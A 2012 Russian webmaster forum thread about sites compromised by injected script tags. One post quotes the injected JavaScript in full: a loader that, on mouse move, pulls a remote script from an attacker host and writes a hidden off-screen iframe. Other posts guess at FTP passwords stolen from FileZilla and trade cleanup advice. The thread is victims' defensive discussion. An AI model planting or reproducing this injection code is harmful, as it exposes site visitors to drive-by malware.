Вернуться   Форум об интернет-маркетинге > >
Ответ
 
Опции темы
Старый 20.04.2012, 19:59   #1
Кандидат наук
 
Регистрация: 12.05.2010
Сообщений: 261
Репутация: 1290

По умолчанию Вероятно вирус на сайте.

На некоторых своих сайтах только что заметил код внизу страницы после закрытия всех тегов (при открытии исходного кода страницы):
PHP код:
<script src="http://statistic.dyndns.org/rss.js"></script> 
или
PHP код:
<script src="http://stat.dontexist.com/rss.js"></script> 
Понять не могу что это. При открытии http://stat.dontexist.com/rss.js показывает пустой файл. Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.
starclyde вне форума   Ответить с цитированием

Реклама
Старый 20.04.2012, 20:09   #2
Jaf4
Академик
 
Аватар для Jaf4
 
Регистрация: 03.08.2009
Адрес: Москва->Краснодар
Сообщений: 11,985
Репутация: 1421773

По умолчанию Re: Вероятно вирус на сайте.

Цитата:
Сообщение от starclyde Посмотреть сообщение
При открытии http://stat.dontexist.com/rss.js показывает пустой файл.
Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..
Jaf4 вне форума   Ответить с цитированием
Старый 20.04.2012, 23:07   #3
semenov
 
 
Регистрация: 28.10.2005
Сообщений: 3,286
Репутация: 142121

По умолчанию Re: Вероятно вирус на сайте.

Цитата:
Сообщение от starclyde Посмотреть сообщение
Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.
Как правило в зашифрованном виде это дело прописывается
semenov вне форума   Ответить с цитированием
Старый 20.04.2012, 23:23   #4
starclyde
Кандидат наук
 
Регистрация: 12.05.2010
Сообщений: 261
Репутация: 1290

ТопикСтартер Re: Вероятно вирус на сайте.

Исправил. Вчера взломали похоже.
Цитата:
Сообщение от Jaf4 Посмотреть сообщение
Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..
Операционка винда + нод32. Как под линуксом то посмотреть его... результат такой же как в винде. FireBug тож результатов не дает. Че за бредовый взлом.
starclyde вне форума   Ответить с цитированием
Старый 20.04.2012, 23:27   #5
NasMnogo-Mbl-Sila
Все права защищены
 
Аватар для NasMnogo-Mbl-Sila
 
Регистрация: 16.11.2010
Сообщений: 373
Репутация: -6250

По умолчанию Re: Вероятно вирус на сайте.

можно в базе поискать, у меня так было. Хитрожопые дописывали скрипты к конец каждой новости. Никак найти не мог)
NasMnogo-Mbl-Sila вне форума   Ответить с цитированием
Старый 21.04.2012, 12:18   #6
starclyde
Кандидат наук
 
Регистрация: 12.05.2010
Сообщений: 261
Репутация: 1290

ТопикСтартер Re: Вероятно вирус на сайте.

Возникла мысль.... а не смс баннеры ли таким образом распространяют.
1. Заразили кучу сайтов js файлами
2. пока ниче в нем не прописывают
3. настает время XXX, прописывают туда вредоносный код для загрузки файла с вирусом и вуаля ваши сайты становятся разносчиком заразы
starclyde вне форума   Ответить с цитированием
Старый 23.04.2012, 16:25   #7
tristamoff
Студент
 
Регистрация: 13.01.2012
Сообщений: 24
Репутация: -364

По умолчанию Re: Вероятно вирус на сайте.

Он в конце файла index.php
tristamoff вне форума   Ответить с цитированием
Старый 25.04.2012, 12:32   #8
rizoen
Абитуриент
 
Регистрация: 25.04.2012
Сообщений: 1
Репутация: 10

По умолчанию Re: Вероятно вирус на сайте.

Столкнулся с такой же ситуацией.
echo '<script src="http://statistic.dyndns.org/rss.js"></script>';
?>
от 134.255.241.125
Вот код

Цитата:
var astatf = 0; document.write("<b><div id='pftgfkzif'></div></b>"); document.onmousemove=jsstatic; function jsstatic() { if (astatf == 0) { astatf++; var url = "http://ohvcdh.dontexist.org/styles.js"; var script = document.createElement('script'); script.setAttribute('src', url);document.getElementsByTagName('head')[0].appendChild(script);}}
Цитата:
text = "<iframe src='http://ohvcdh.dontexist.org/route.htm' width='6' height='10 ' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> ";
document.getElementById("pftgfkzif").innerHTML = text ;
Занятно, банит, если обращений несколько и при последующих файлы пустые.
Дописался во все индексы сайтов, которые у меня были в закладках файлзиллы, в одном случае похерил весь код. Хостингов (компаний) там было 2, так что похоже от меня (хотя не все сайты я даже открывал)

Кто то вылавливал причину?

Последний раз редактировалось rizoen; 25.04.2012 в 12:45..
rizoen вне форума   Ответить с цитированием
Старый 26.04.2012, 21:59   #9
t707722
Абитуриент
 
Регистрация: 11.03.2011
Сообщений: 4
Репутация: 10

По умолчанию Re: Вероятно вирус на сайте.

5 сайтов на сервере все заражены, этой херней, кто как лечил ? Не могу найти концы, все файлы прочисал, результат 0. Хелп плиз.
Сори тупанул искал в шаблоне , казалось индексный файл в корне лежал.

ПС. Есть мысль что на компе был трой который украл пасы из FileZilla у кого нить еще стоит FileZilla ? Тк у меня не один серв оказался заражен.

Последний раз редактировалось t707722; 26.04.2012 в 22:42..
t707722 вне форума   Ответить с цитированием
Старый 26.04.2012, 22:02   #10
Jaf4
Академик
 
Аватар для Jaf4
 
Регистрация: 03.08.2009
Адрес: Москва->Краснодар
Сообщений: 11,985
Репутация: 1421773

По умолчанию Re: Вероятно вирус на сайте.

Цитата:
Сообщение от t707722 Посмотреть сообщение
5 сайтов на сервере все заражены, этой херней.
Тут от "херни" вряд-ли помогут. Пиши, что говорит антивирус для начала, что делал, чтобы вылечить. Пробовал из бэкапа залить измененные файлы?
Jaf4 вне форума   Ответить с цитированием
Ответ



Опции темы

Быстрый переход


Регистрация Справка Календарь Поддержка Все разделы прочитаны